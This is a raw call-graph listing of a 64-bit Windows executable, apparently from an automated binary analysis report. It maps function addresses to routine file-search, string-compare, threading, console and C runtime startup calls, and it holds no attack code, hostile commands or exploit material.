7ff6256ccda4 10 API calls 2 library calls 38763->38792 38765 7ff6256f8027 38793 7ff6256cca40 61 API calls _CxxThrowException 38765->38793 38767->38683 38769 7ff6256c9e46 38768->38769 38772 7ff6256c9e6e memcpy_s 38768->38772 38770 7ff6256f9ce4 8 API calls 38769->38770 38771 7ff6256c9e5e 38770->38771 38773 7ff6256f9b70 8 API calls 38771->38773 38774 7ff6256c9e85 38772->38774 38776 7ff6256f9ce4 8 API calls 38772->38776 38773->38772 38775 7ff6256f9ce4 8 API calls 38774->38775 38777 7ff6256c9f97 38775->38777 38776->38774 38778 7ff6256f9b70 8 API calls 38777->38778 38780 7ff6256c9fa8 memcpy_s 38778->38780 38779 7ff6256c9fb4 38781 7ff6256f9ce4 8 API calls 38779->38781 38780->38779 38782 7ff6256f9ce4 8 API calls 38780->38782 38783 7ff6256ca0bb 38781->38783 38782->38779 38784 7ff6256f9b70 8 API calls 38783->38784 38785 7ff6256ca0c9 38784->38785 38786 7ff62570a610 _UnwindNestedFrames 8 API calls 38785->38786 38787 7ff6256ca0d8 38786->38787 38787->38748 38788->38747 38789->38746 38790->38743 38791->38763 38792->38765 38793->38760 38794->38534 38796->38539 38798->38555 38799->38549 38801 7ff6256d1c3b 38800->38801 38802 7ff6256d1c37 38800->38802 38801->38802 38803 7ff6256d1c5d 38801->38803 38802->38350 38811 7ff6256d2d6c 12 API calls 2 library calls 38803->38811 38806 7ff6256d194c 38805->38806 38807 7ff6256d1964 38805->38807 38806->38807 38809 7ff6256d1958 CloseHandle 38806->38809 38808 7ff6256d1988 38807->38808 38812 7ff6256cc9d0 10 API calls 38807->38812 38808->38350 38809->38807 38811->38802 38812->38808 38813 7ff6256b1884 38945 7ff6256e34e4 38813->38945 38816 7ff6256e34e4 CompareStringW 38818 7ff6256b18a6 38816->38818 38817 7ff6256b1926 38819 7ff6256b195b 38817->38819 39009 7ff6256e3f98 63 API calls 2 library calls 38817->39009 38820 7ff6256e34e4 CompareStringW 38818->38820 38826 7ff6256b18b9 38818->38826 38827 7ff6256b1970 38819->38827 39010 7ff6256d2ed8 100 API calls 3 library calls 38819->39010 38820->38826 38824 7ff6256b1915 39008 7ff6256cca40 61 API calls _CxxThrowException 38824->39008 38826->38817 39007 7ff6256b1168 8 API calls 2 library calls 38826->39007 38828 7ff6256b19b8 38827->38828 39011 7ff6256f49f4 48 API calls 38827->39011 38949 7ff6256b5450 38828->38949 38830 7ff6256b19b0 39012 7ff6256c8444 54 API calls fflush 38830->39012 38836 7ff6256b72c4 76 API calls 38837 7ff6256b1a12 38836->38837 38838 7ff6256b1b04 38837->38838 38839 7ff6256b1ae6 38837->38839 38987 7ff6256c6c94 38838->38987 38983 7ff6256b7514 38839->38983 38842 7ff6256b1af2 38843 7ff6256b7514 72 API calls 38842->38843 38844 7ff6256b1aff 38843->38844 38845 7ff62570a610 _UnwindNestedFrames 8 API calls 38844->38845 38846 7ff6256b2f97 38845->38846 38847 7ff6256b1b13 39003 7ff6256b7148 38847->39003 38849 7ff6256b1c71 38850 7ff6256b1ca7 38849->38850 38851 7ff6256b63e8 8 API calls 38849->38851 38853 7ff6256b1ce4 38850->38853 38854 7ff6256b1cd5 38850->38854 38852 7ff6256b1c91 38851->38852 38855 7ff6256b49b8 99 API calls 38852->38855 38857 7ff62570a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38853->38857 38856 7ff62570a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38854->38856 38858 7ff6256b1c9d 38855->38858 38860 7ff6256b1cee 38856->38860 38857->38860 38859 7ff6256b63e8 8 API calls 38858->38859 38859->38850 38861 7ff6256b1d50 38860->38861 38863 7ff6256fde30 72 API calls 38860->38863 38862 7ff62570a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38861->38862 38864 7ff6256b1d62 38862->38864 38863->38861 38865 7ff6256fdbd0 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38864->38865 38866 7ff6256b1d7b 38864->38866 38865->38866 38867 7ff625702bcc 66 API calls 38866->38867 38868 7ff6256b1dba 38867->38868 38941 7ff6256dae10 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38868->38941 38869 7ff6256b1e1c 38871 7ff6256b10c0 8 API calls 38869->38871 38873 7ff6256b1e5d 38869->38873 38870 7ff6256b1dde std::bad_alloc::bad_alloc 38870->38869 38872 7ff62570ba34 _CxxThrowException RtlPcToFileHeader RaiseException 38870->38872 38871->38873 38872->38869 38874 7ff6256ba410 159 API calls 38873->38874 38938 7ff6256b1ef4 38873->38938 38874->38938 38875 7ff6256b2ccc 38876 7ff6256b2d0c 38875->38876 38940 7ff6256d8c80 72 API calls 38875->38940 38877 7ff6256fde30 72 API calls 38876->38877 38883 7ff6256b2d21 38876->38883 38877->38883 38878 7ff6256b2d86 38885 7ff6256f49f4 48 API calls 38878->38885 38919 7ff6256b2dd0 38878->38919 38879 7ff6256d6688 48 API calls 38879->38938 38880 7ff6256b5e70 169 API calls 38937 7ff6256b2005 38880->38937 38881 7ff6256ba410 159 API calls 38881->38938 38882 7ff6256b80e4 192 API calls 38882->38919 38883->38878 38886 7ff6256f49f4 48 API calls 38883->38886 38884 7ff6256ba504 208 API calls 38884->38919 38889 7ff6256b2d9e 38885->38889 38891 7ff6256b2d6c 38886->38891 38887 7ff6256b5928 237 API calls 38887->38937 38888 7ff6256be6c8 157 API calls 38888->38938 38892 7ff6256c8444 54 API calls 38889->38892 38890 7ff6256d7c7c 127 API calls 38890->38919 38894 7ff6256f49f4 48 API calls 38891->38894 38893 7ff6256b2da6 38892->38893 38901 7ff6256d1c24 12 API calls 38893->38901 38898 7ff6256b2d79 38894->38898 38895 7ff6256ce21c 63 API calls 38895->38937 38896 7ff6256b1168 8 API calls 38896->38919 38897 7ff6256bb540 147 API calls 38897->38938 38899 7ff6256c8444 54 API calls 38898->38899 38899->38878 38900 7ff6256d65b4 48 API calls 38900->38938 38901->38919 38902 7ff6256ba4d0 12 API calls 38902->38938 38903 7ff6256fae50 71 API calls 38908 7ff6256b2e39 38903->38908 38904 7ff6256d4554 16 API calls 38904->38938 38905 7ff6256d1998 138 API calls 38905->38938 38906 7ff6256b33b4 64 API calls 38906->38919 38907 7ff6256b5db4 46 API calls 38907->38938 38908->38903 38909 7ff6256cca40 61 API calls 38908->38909 38908->38919 38909->38919 38910 7ff6256b6188 231 API calls 38910->38919 38911 7ff6256d1e80 15 API calls 38911->38938 38912 7ff6256d1930 11 API calls 38912->38938 38913 7ff6256b3f74 138 API calls 38913->38919 38914 7ff6256bb540 147 API calls 38914->38937 38915 7ff6256ccbd0 75 API calls 38915->38938 38916 7ff6256d7c7c 127 API calls 38916->38938 38917 7ff6256eba9c 195 API calls 38917->38919 38918 7ff6256f49f4 48 API calls 38918->38919 38919->38882 38919->38884 38919->38890 38919->38896 38919->38906 38919->38908 38919->38910 38919->38913 38919->38917 38919->38918 38921 7ff6256c8444 54 API calls 38919->38921 38920 7ff6256b5004 49 API calls 38920->38938 38921->38919 38922 7ff6256d18ac 15 API calls 38922->38938 38923 7ff6256b1168 8 API calls 38923->38938 38924 7ff6256fd48c 58 API calls 38924->38938 38925 7ff6256b571c 12 API calls 38925->38938 38926 7ff6256b5e70 169 API calls 38926->38938 38927 7ff6256fc0a8 10 API calls 38927->38938 38928 7ff6256c9be0 14 API calls 38928->38938 38929 7ff6256d6378 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38929->38938 38930 7ff6256e97f0 GetStdHandle ReadFile GetLastError GetLastError GetFileType 38930->38938 38931 7ff6256d5c0c 237 API calls 38931->38938 38932 7ff6256d5d40 237 API calls 38932->38938 38933 7ff6256fb6d0 73 API calls 38933->38937 38934 7ff6256b6114 216 API calls 38934->38938 38935 7ff6256f49f4 48 API calls 38935->38937 38936 7ff6256d5708 237 API calls 38936->38938 38937->38880 38937->38887 38937->38895 38937->38914 38937->38933 38937->38935 38937->38938 38939 7ff6256c8444 54 API calls 38937->38939 38938->38875 38938->38879 38938->38881 38938->38888 38938->38897 38938->38900 38938->38902 38938->38904 38938->38905 38938->38907 38938->38911 38938->38912 38938->38915 38938->38916 38938->38920 38938->38922 38938->38923 38938->38924 38938->38925 38938->38926 38938->38927 38938->38928 38938->38929 38938->38930 38938->38931 38938->38932 38938->38934 38938->38936 38938->38937 38942 7ff6256da250 237 API calls 38938->38942 38943 7ff6256c0d60 237 API calls 38938->38943 38944 7ff6256daae0 237 API calls 38938->38944 38939->38937 38940->38876 38941->38870 38942->38938 38943->38937 38944->38937 38946 7ff6256e34f6 38945->38946 38947 7ff6256b1893 38946->38947 39013 7ff6256fdac0 CompareStringW 38946->39013 38947->38816 38947->38826 38952 7ff6256b546f pre_c_initialization 38949->38952 38950 7ff6256b554a memcpy_s 38954 7ff6256fc0a8 10 API calls 38950->38954 38952->38950 38967 7ff6256b5588 memcpy_s 38952->38967 38953 7ff6256b5583 39043 7ff6256b6eb8 38953->39043 38955 7ff6256b5576 38954->38955 38958 7ff6256b681c 54 API calls 38955->38958 38958->38953 38959 7ff6256b56e9 39050 7ff6256f6f68 38959->39050 38961 7ff6256b56f6 38962 7ff62570a610 _UnwindNestedFrames 8 API calls 38961->38962 38963 7ff6256b19df 38962->38963 38969 7ff6256b72c4 38963->38969 38967->38953 39014 7ff6256b3210 38967->39014 39020 7ff6256c7088 38967->39020 39024 7ff6256b681c 38967->39024 39035 7ff6256f7a24 38967->39035 39054 7ff6256b571c 38967->39054 39062 7ff6256c4380 14 API calls 38967->39062 38970 7ff6256b72eb 38969->38970 39180 7ff6256c88dc 38970->39180 38972 7ff6256b7302 39184 7ff6256e915c 38972->39184 38974 7ff6256b730f 39196 7ff6256e7044 38974->39196 38977 7ff62570a444 new 4 API calls 38979 7ff6256b73e3 38977->38979 38978 7ff6256b73f5 memcpy_s 38981 7ff6256c9be0 14 API calls 38978->38981 38979->38978 39201 7ff6256d894c 38979->39201 38982 7ff6256b1a01 38981->38982 38982->38836 38984 7ff6256b7539 38983->38984 39227 7ff6256e922c 38984->39227 38988 7ff6256c6d45 38987->38988 38989 7ff6256c6cbc 38987->38989 38990 7ff6256c6d83 38988->38990 38992 7ff6256c6d69 38988->38992 39243 7ff6256e9f78 8 API calls 2 library calls 38988->39243 38991 7ff6256c6cd9 38989->38991 39238 7ff6256e9f78 8 API calls 2 library calls 38989->39238 38990->38847 38994 7ff6256c6cf3 38991->38994 39239 7ff6256e9f78 8 API calls 2 library calls 38991->39239 38992->38990 39244 7ff6256e9f78 8 API calls 2 library calls 38992->39244 38999 7ff6256c6d0d 38994->38999 39240 7ff6256e9f78 8 API calls 2 library calls 38994->39240 39001 7ff6256c6d2b 38999->39001 39241 7ff6256e9f78 8 API calls 2 library calls 38999->39241 39001->38990 39242 7ff6256e9f78 8 API calls 2 library calls 39001->39242 39004 7ff6256b7162 39003->39004 39005 7ff6256b7167 39003->39005 39245 7ff6256b6c64 130 API calls _UnwindNestedFrames 39004->39245 39007->38824 39008->38817 39009->38819 39010->38827 39011->38830 39012->38828 39013->38947 39015 7ff6256b32e9 39014->39015 39016 7ff6256b3231 39014->39016 39015->38967 39016->39015 39063 7ff6256c4380 14 API calls 39016->39063 39018 7ff6256b329c 39018->39015 39064 7ff6256d2a20 22 API calls 2 library calls 39018->39064 39021 7ff6256c70a4 39020->39021 39023 7ff6256c70c5 39021->39023 39065 7ff6256d8558 10 API calls 2 library calls 39021->39065 39023->38967 39066 7ff6256b6714 39024->39066 39026 7ff6256b6836 39027 7ff6256b6853 39026->39027 39077 7ff6257148c0 31 API calls _invalid_parameter_noinfo 39026->39077 39027->38967 39029 7ff6256b684b 39029->39027 39030 7ff6256b68a9 std::bad_alloc::bad_alloc 39029->39030 39078 7ff62570ba34 RtlPcToFileHeader RaiseException 39030->39078 39032 7ff6256b68c4 39079 7ff6256b7188 12 API calls 39032->39079 39034 7ff6256b68eb 39034->38967 39036 7ff6256f7a4f 39035->39036 39041 7ff6256f7a59 39035->39041 39036->38967 39037 7ff6256f7a7c 39116 7ff6256fb6d0 73 API calls _Init_thread_footer 39037->39116 39040 7ff6256f7b1c 60 API calls 39040->39041 39041->39036 39041->39037 39041->39040 39084 7ff6256f71fc 39041->39084 39117 7ff6256c41b0 14 API calls 2 library calls 39041->39117 39044 7ff6256b6ee6 39043->39044 39049 7ff6256b6f5c 39043->39049 39173 7ff6256f9f64 8 API calls memcpy_s 39044->39173 39046 7ff6256b6efb 39047 7ff6256b6f2f 39046->39047 39046->39049 39047->39046 39174 7ff6256b7188 12 API calls 39047->39174 39049->38959 39051 7ff6256f6fb4 39050->39051 39053 7ff6256f6f8a 39050->39053 39052 7ff6256d4538 FindClose 39052->39053 39053->39051 39053->39052 39055 7ff6256b5742 39054->39055 39057 7ff6256b575d 39054->39057 39055->39057 39179 7ff6256e3520 12 API calls 2 library calls 39055->39179 39175 7ff6256e3610 39057->39175 39060 7ff6256b57fc 39060->38967 39061 7ff6256e48bc 8 API calls 39061->39060 39062->38967 39063->39018 39064->39015 39065->39021 39067 7ff6256b6738 39066->39067 39076 7ff6256b67a7 memcpy_s 39066->39076 39068 7ff6256b6765 39067->39068 39080 7ff6256cca6c 48 API calls 3 library calls 39067->39080 39070 7ff6256b6786 39068->39070 39072 7ff6256b67e1 39068->39072 39070->39076 39082 7ff6256ccb64 8 API calls 39070->39082 39071 7ff6256b6759 39081 7ff6256ccb64 8 API calls 39071->39081 39072->39076 39083 7ff6256ccb64 8 API calls 39072->39083 39076->39026 39077->39029 39078->39032 39079->39034 39080->39071 39090 7ff6256f7217 pre_c_initialization 39084->39090 39086 7ff62570a610 _UnwindNestedFrames 8 API calls 39088 7ff6256f776f 39086->39088 39088->39041 39089 7ff6256f7453 39091 7ff6256f7464 39089->39091 39092 7ff6256f7476 39089->39092 39099 7ff6256f729c 39090->39099 39107 7ff6256f725a 39090->39107 39110 7ff6256f73c5 39090->39110 39125 7ff6256d4554 39090->39125 39139 7ff6256f7c38 55 API calls 3 library calls 39091->39139 39111 7ff6256f7496 39092->39111 39122 7ff6256d4538 39092->39122 39095 7ff6256f7342 39095->39107 39112 7ff6256f7656 39095->39112 39115 7ff6256f76ef 39095->39115 39140 7ff6256c4380 14 API calls 39095->39140 39096 7ff6256f7471 39096->39092 39101 7ff6256f73bb 39099->39101 39103 7ff6256f732e 39099->39103 39133 7ff62570a444 39101->39133 39103->39095 39104 7ff6256f734a 39103->39104 39106 7ff6256f737e 39104->39106 39104->39107 39131 7ff6256c4380 14 API calls 39104->39131 39105 7ff6256d4554 16 API calls 39105->39107 39106->39107 39132 7ff6256ccbd0 75 API calls 39106->39132 39107->39086 39118 7ff6256d45cc 39110->39118 39111->39105 39111->39107 39112->39107 39112->39112 39113 7ff6256f7723 39112->39113 39112->39115 39141 7ff6256bc214 8 API calls 2 library calls 39113->39141 39115->39107 39142 7ff6256d8558 10 API calls 2 library calls 39115->39142 39117->39041 39119 7ff6256d45ed 39118->39119 39120 7ff6256d46ec 15 API calls 39119->39120 39121 7ff6256d46b2 39119->39121 39120->39119 39121->39089 39121->39095 39123 7ff6256d454f 39122->39123 39124 7ff6256d4549 FindClose 39122->39124 39123->39111 39124->39123 39126 7ff6256d4570 39125->39126 39127 7ff6256d4574 39126->39127 39143 7ff6256d46ec 39126->39143 39127->39099 39130 7ff6256d458d FindClose 39130->39127 39131->39106 39132->39107 39134 7ff62570a44f 39133->39134 39135 7ff62570a47a 39134->39135 39136 7ff6257136c0 new 2 API calls 39134->39136 39171 7ff62570b314 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 39134->39171 39172 7ff62570b2f4 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 39134->39172 39135->39110 39136->39134 39139->39096 39140->39112 39141->39107 39142->39107 39144 7ff6256d4705 pre_c_initialization 39143->39144 39145 7ff6256d4733 FindFirstFileW 39144->39145 39146 7ff6256d47a4 FindNextFileW 39144->39146 39147 7ff6256d478b 39145->39147 39149 7ff6256d4749 39145->39149 39146->39147 39148 7ff6256d47ae GetLastError 39146->39148 39151 7ff62570a610 _UnwindNestedFrames 8 API calls 39147->39151 39148->39147 39156 7ff6256e4534 39149->39156 39153 7ff6256d4587 39151->39153 39153->39127 39153->39130 39154 7ff6256d475f FindFirstFileW 39154->39147 39155 7ff6256d477a GetLastError 39154->39155 39155->39147 39157 7ff6256e4549 pre_c_initialization 39156->39157 39167 7ff6256e45a2 39157->39167 39168 7ff6256e472c CharUpperW 39157->39168 39159 7ff6256e4579 39169 7ff6256e4760 CharUpperW 39159->39169 39160 7ff62570a610 _UnwindNestedFrames 8 API calls 39161 7ff6256d475b 39160->39161 39161->39154 39161->39155 39163 7ff6256e4592 39164 7ff6256e459a 39163->39164 39165 7ff6256e4629 GetCurrentDirectoryW 39163->39165 39170 7ff6256e472c CharUpperW 39164->39170 39165->39167 39167->39160 39168->39159 39169->39163 39170->39167 39173->39046 39174->39047 39176 7ff6256e3626 pre_c_initialization wcschr 39175->39176 39177 7ff62570a610 _UnwindNestedFrames 8 API calls 39176->39177 39178 7ff6256b57e1 39177->39178 39178->39060 39178->39061 39179->39057 39181 7ff6256c8919 39180->39181 39206 7ff6256f4b14 39181->39206 39183 7ff6256c8954 memcpy_s 39183->38972 39185 7ff6256e9199 39184->39185 39186 7ff62570a480 4 API calls 39185->39186 39187 7ff6256e91be 39186->39187 39188 7ff62570a444 new 4 API calls 39187->39188 39189 7ff6256e91cf 39188->39189 39190 7ff6256e91e1 39189->39190 39191 7ff6256c88dc 8 API calls 39189->39191 39192 7ff62570a444 new 4 API calls 39190->39192 39191->39190 39193 7ff6256e91f7 39192->39193 39194 7ff6256e9209 39193->39194 39195 7ff6256c88dc 8 API calls 39193->39195 39194->38974 39195->39194 39197 7ff6256c88dc 8 API calls 39196->39197 39198 7ff6256e7063 39197->39198 39199 7ff6256e72c0 4 API calls 39198->39199 39200 7ff6256b7325 39199->39200 39200->38977 39200->38978 39211 7ff6256f7d80 39201->39211 39207 7ff6256f4b2b 39206->39207 39208 7ff6256f4b26 39206->39208 39207->39183 39210 7ff6256f4b38 8 API calls _UnwindNestedFrames 39208->39210 39210->39207 39218 7ff6256f8094 39211->39218 39214 7ff6256d8a44 39215 7ff6256d8a5a memcpy_s 39214->39215 39222 7ff6256fbac4 39215->39222 39219 7ff6256f809f 39218->39219 39220 7ff6256f7ec8 68 API calls 39219->39220 39221 7ff6256d896e 39220->39221 39221->39214 39225 7ff6256fba70 GetCurrentProcess GetProcessAffinityMask 39222->39225 39226 7ff6256d89c5 39225->39226 39226->38978 39228 7ff6256e9245 39227->39228 39235 7ff6256d6194 72 API calls 39228->39235 39230 7ff6256e92b1 39236 7ff6256d6194 72 API calls 39230->39236 39232 7ff6256e92bd 39237 7ff6256d6194 72 API calls 39232->39237 39234 7ff6256e92c9 39235->39230 39236->39232 39237->39234 39238->38991 39239->38994 39240->38999 39241->39001 39242->38988 39243->38992 39244->38990 39245->39005 39246 7ff6256fbb70 39249 7ff6256fbb80 39246->39249 39258 7ff6256fbae8 39249->39258 39251 7ff6256fbb79 39253 7ff6256fbbd5 LeaveCriticalSection 39255 7ff6256fbae8 67 API calls 39253->39255 39254 7ff6256fbbc8 SetEvent 39254->39253 39256 7ff6256fbb97 39255->39256 39256->39251 39263 7ff6256c1690 39256->39263 39267 7ff6256fb974 WaitForSingleObject 39258->39267 39261 7ff6256fbb12 39261->39256 39262 7ff6256fbb16 EnterCriticalSection LeaveCriticalSection 39262->39261 39264 7ff6256c16c2 EnterCriticalSection 39263->39264 39266 7ff6256c16a4 39263->39266 39264->39253 39264->39254 39266->39264 39275 7ff6256c1180 39266->39275 39268 7ff6256fb9b7 39267->39268 39269 7ff6256fb986 GetLastError 39267->39269 39268->39261 39268->39262 39273 7ff6256cca6c 48 API calls 3 library calls 39269->39273 39271 7ff6256fb9a6 39274 7ff6256cca40 61 API calls _CxxThrowException 39271->39274 39273->39271 39274->39268 39276 7ff6256c11ab 39275->39276 39280 7ff6256c11b0 39275->39280 39285 7ff6256c17c8 216 API calls 2 library calls 39276->39285 39278 7ff6256c166a 39278->39266 39279 7ff6256e6d38 216 API calls 39279->39280 39280->39278 39280->39279 39281 7ff6256c1080 48 API calls 39280->39281 39283 7ff6256e6fe8 216 API calls 39280->39283 39284 7ff6256e6e90 216 API calls 39280->39284 39286 7ff6256c17c8 216 API calls 2 library calls 39280->39286 39281->39280 39283->39280 39284->39280 39285->39280 39286->39280 39287 7ff62570b0fc 39306 7ff62570aa8c 39287->39306 39291 7ff62570b148 39296 7ff62570b169 __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 39291->39296 39314 7ff62571472c 39291->39314 39292 7ff62570b123 __scrt_acquire_startup_lock 39292->39291 39362 7ff62570b52c 7 API calls memcpy_s 39292->39362 39295 7ff62570b16d 39296->39295 39297 7ff62570b1f7 39296->39297 39363 7ff625712574 35 API calls __FrameUnwindToState 39296->39363 39318 7ff625713fc4 39297->39318 39304 7ff62570b220 39364 7ff62570ac64 8 API calls 2 library calls 39304->39364 39307 7ff62570aaae __isa_available_init 39306->39307 39365 7ff62570e2f8 39307->39365 39313 7ff62570aab7 39313->39292 39361 7ff62570b52c 7 API calls memcpy_s 39313->39361 39316 7ff625714744 39314->39316 39315 7ff625714766 39315->39296 39316->39315 39414 7ff62570b010 39316->39414 39319 7ff62570b20c 39318->39319 39320 7ff625713fd4 39318->39320 39322 7ff6256e7e20 39319->39322 39505 7ff625713c84 54 API calls 39320->39505 39506 7ff6256fb470 GetModuleHandleW 39322->39506 39328 7ff6256e7e58 SetErrorMode GetModuleHandleW 39329 7ff6256f48cc 21 API calls 39328->39329 39330 7ff6256e7e7d 39329->39330 39331 7ff6256f3e48 137 API calls 39330->39331 39332 7ff6256e7e90 39331->39332 39333 7ff6256c3d3c 126 API calls 39332->39333 39334 7ff6256e7e9c 39333->39334 39335 7ff62570a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39334->39335 39336 7ff6256e7ead 39335->39336 39337 7ff6256e7ebf 39336->39337 39338 7ff6256c3f18 70 API calls 39336->39338 39339 7ff6256c4d1c 157 API calls 39337->39339 39338->39337 39340 7ff6256e7ed6 39339->39340 39341 7ff6256e7eef 39340->39341 39342 7ff6256c6ad0 154 API calls 39340->39342 39343 7ff6256c4d1c 157 API calls 39341->39343 39344 7ff6256e7ee7 39342->39344 39345 7ff6256e7eff 39343->39345 39346 7ff6256c4e48 160 API calls 39344->39346 39347 7ff6256e7f0d 39345->39347 39349 7ff6256e7f14 39345->39349 39346->39341 39348 7ff6256fb650 CreateEventW CloseHandle CreateEventW GetLastError CloseHandle 39347->39348 39348->39349 39350 7ff6256c4888 58 API calls 39349->39350 39351 7ff6256e7f57 39350->39351 39352 7ff6256c4fd0 268 API calls 39351->39352 39353 7ff6256e7f5f 39352->39353 39354 7ff6256e7f9e 39353->39354 39355 7ff6256e7f8c 39353->39355 39359 7ff62570b684 GetModuleHandleW 39354->39359 39356 7ff6256fb650 CreateEventW CloseHandle CreateEventW GetLastError CloseHandle 39355->39356 39357 7ff6256e7f93 39356->39357 39357->39354 39358 7ff6256fb57c 14 API calls 39357->39358 39358->39354 39360 7ff62570b698 39359->39360 39360->39304 39361->39292 39362->39291 39363->39297 39364->39295 39366 7ff62570e301 __vcrt_initialize_pure_virtual_call_handler __vcrt_initialize_winapi_thunks 39365->39366 39378 7ff62570eb08 39366->39378 39369 7ff62570aab3 39369->39313 39373 7ff6257145e4 39369->39373 39371 7ff62570e318 39371->39369 39385 7ff62570eb50 DeleteCriticalSection 39371->39385 39374 7ff625719d4c 39373->39374 39375 7ff62570aac0 39374->39375 39402 7ff6257166c0 39374->39402 39375->39313 39377 7ff62570e32c 8 API calls 3 library calls 39375->39377 39377->39313 39379 7ff62570eb10 39378->39379 39381 7ff62570eb41 39379->39381 39383 7ff62570e30b 39379->39383 39386 7ff62570e678 39379->39386 39391 7ff62570eb50 DeleteCriticalSection 39381->39391 39383->39369 39384 7ff62570e8a4 8 API calls 3 library calls 39383->39384 39384->39371 39385->39369 39392 7ff62570e34c 39386->39392 39389 7ff62570e6cf InitializeCriticalSectionAndSpinCount 39390 7ff62570e6bb 39389->39390 39390->39379 39391->39383 39393 7ff62570e3ad 39392->39393 39394 7ff62570e3b2 39392->39394 39393->39394 39395 7ff62570e47a 39393->39395 39396 7ff62570e3e5 LoadLibraryExW 39393->39396 39401 7ff62570e458 FreeLibrary 39393->39401 39394->39389 39394->39390 39395->39394 39397 7ff62570e489 GetProcAddress 39395->39397 39396->39393 39398 7ff62570e40b GetLastError 39396->39398 39397->39394 39399 7ff62570e4a1 39397->39399 39398->39393 39400 7ff62570e416 LoadLibraryExW 39398->39400 39399->39394 39400->39393 39401->39393 39413 7ff625716938 EnterCriticalSection 39402->39413 39404 7ff6257166d0 39405 7ff625718050 32 API calls 39404->39405 39406 7ff6257166d9 39405->39406 39407 7ff6257166e7 39406->39407 39408 7ff6257164d0 34 API calls 39406->39408 39409 7ff625716998 fflush LeaveCriticalSection 39407->39409 39410 7ff6257166e2 39408->39410 39411 7ff6257166f3 39409->39411 39412 7ff6257165bc GetStdHandle GetFileType 39410->39412 39411->39374 39412->39407 39415 7ff62570b020 pre_c_initialization 39414->39415 39435 7ff625712b00 39415->39435 39417 7ff62570b02c pre_c_initialization 39441 7ff62570aad8 39417->39441 39419 7ff62570b045 39420 7ff62570b049 _RTC_Initialize 39419->39420 39421 7ff62570b0b5 39419->39421 39446 7ff62570ace0 39420->39446 39477 7ff62570b52c 7 API calls memcpy_s 39421->39477 39423 7ff62570b0bf 39478 7ff62570b52c 7 API calls memcpy_s 39423->39478 39426 7ff62570b0ca __scrt_initialize_default_local_stdio_options 39426->39316 39427 7ff62570b05a pre_c_initialization 39449 7ff625713b0c 39427->39449 39430 7ff62570b06a 39476 7ff62570b7dc RtlInitializeSListHead 39430->39476 39436 7ff625712b11 39435->39436 39440 7ff625712b19 39436->39440 39479 7ff625714f3c 15 API calls memcpy_s 39436->39479 39438 7ff625712b28 39480 7ff625714e1c 31 API calls _invalid_parameter_noinfo 39438->39480 39440->39417 39442 7ff62570ab96 39441->39442 39445 7ff62570aaf0 __scrt_initialize_onexit_tables 39441->39445 39481 7ff62570b52c 7 API calls memcpy_s 39442->39481 39444 7ff62570aba0 39445->39419 39482 7ff62570ac90 39446->39482 39448 7ff62570ace9 39448->39427 39450 7ff625713b2a 39449->39450 39451 7ff625713b40 39449->39451 39491 7ff625714f3c 15 API calls memcpy_s 39450->39491 39487 7ff625719370 39451->39487 39454 7ff625713b2f 39492 7ff625714e1c 31 API calls _invalid_parameter_noinfo 39454->39492 39457 7ff625713b72 39493 7ff6257138ec 35 API calls pre_c_initialization 39457->39493 39458 7ff62570b066 39458->39423 39458->39430 39460 7ff625713b9c 39494 7ff625713aa8 15 API calls __vcrt_getptd_noexit 39460->39494 39462 7ff625713bb2 39463 7ff625713bba 39462->39463 39464 7ff625713bcb 39462->39464 39495 7ff625714f3c 15 API calls memcpy_s 39463->39495 39496 7ff6257138ec 35 API calls pre_c_initialization 39464->39496 39467 7ff625714a74 __vcrt_getptd_noexit 15 API calls 39467->39458 39468 7ff625713be7 39469 7ff625713c17 39468->39469 39470 7ff625713c30 39468->39470 39474 7ff625713bbf 39468->39474 39497 7ff625714a74 39469->39497 39472 7ff625714a74 __vcrt_getptd_noexit 15 API calls 39470->39472 39472->39474 39473 7ff625713c20 39475 7ff625714a74 __vcrt_getptd_noexit 15 API calls 39473->39475 39474->39467 39475->39458 39477->39423 39478->39426 39479->39438 39480->39440 39481->39444 39483 7ff62570acbf 39482->39483 39485 7ff62570acb5 _onexit 39482->39485 39486 7ff625714434 34 API calls _onexit 39483->39486 39485->39448 39486->39485 39488 7ff62571937d 39487->39488 39489 7ff625713b45 GetModuleFileNameA 39487->39489 39503 7ff6257191b0 48 API calls 5 library calls 39488->39503 39489->39457 39491->39454 39492->39458 39493->39460 39494->39462 39495->39474 39496->39468 39498 7ff625714a79 RtlFreeHeap 39497->39498 39502 7ff625714aa9 __vcrt_getptd_noexit 39497->39502 39499 7ff625714a94 39498->39499 39498->39502 39504 7ff625714f3c 15 API calls memcpy_s 39499->39504 39501 7ff625714a99 GetLastError 39501->39502 39502->39473 39503->39489 39504->39501 39505->39319 39507 7ff6256e7e45 39506->39507 39508 7ff6256fb496 GetProcAddress 39506->39508 39511 7ff6256c7a68 39507->39511 39509 7ff6256fb4ae 39508->39509 39510 7ff6256fb4cb GetProcAddress 39508->39510 39509->39510 39510->39507 39512 7ff6256c7a76 39511->39512 39532 7ff625712ae4 39512->39532 39514 7ff6256c7a80 39515 7ff625712ae4 setbuf 60 API calls 39514->39515 39516 7ff6256c7a94 39515->39516 39541 7ff6256c7b44 GetStdHandle GetFileType 39516->39541 39519 7ff6256c7b44 3 API calls 39520 7ff6256c7aae 39519->39520 39521 7ff6256c7b44 3 API calls 39520->39521 39523 7ff6256c7abe 39521->39523 39522 7ff6256c7b12 39531 7ff6256ccd78 SetConsoleCtrlHandler 39522->39531 39525 7ff6256c7aeb 39523->39525 39544 7ff625712abc 31 API calls 2 library calls 39523->39544 39525->39522 39546 7ff625712abc 31 API calls 2 library calls 39525->39546 39526 7ff6256c7adf 39545 7ff625712b40 33 API calls 3 library calls 39526->39545 39529 7ff6256c7b06 39547 7ff625712b40 33 API calls 3 library calls 39529->39547 39534 7ff625712ae9 39532->39534 39533 7ff625717ee8 39548 7ff625714f3c 15 API calls memcpy_s 39533->39548 39534->39533 39537 7ff625717f23 39534->39537 39536 7ff625717eed 39549 7ff625714e1c 31 API calls 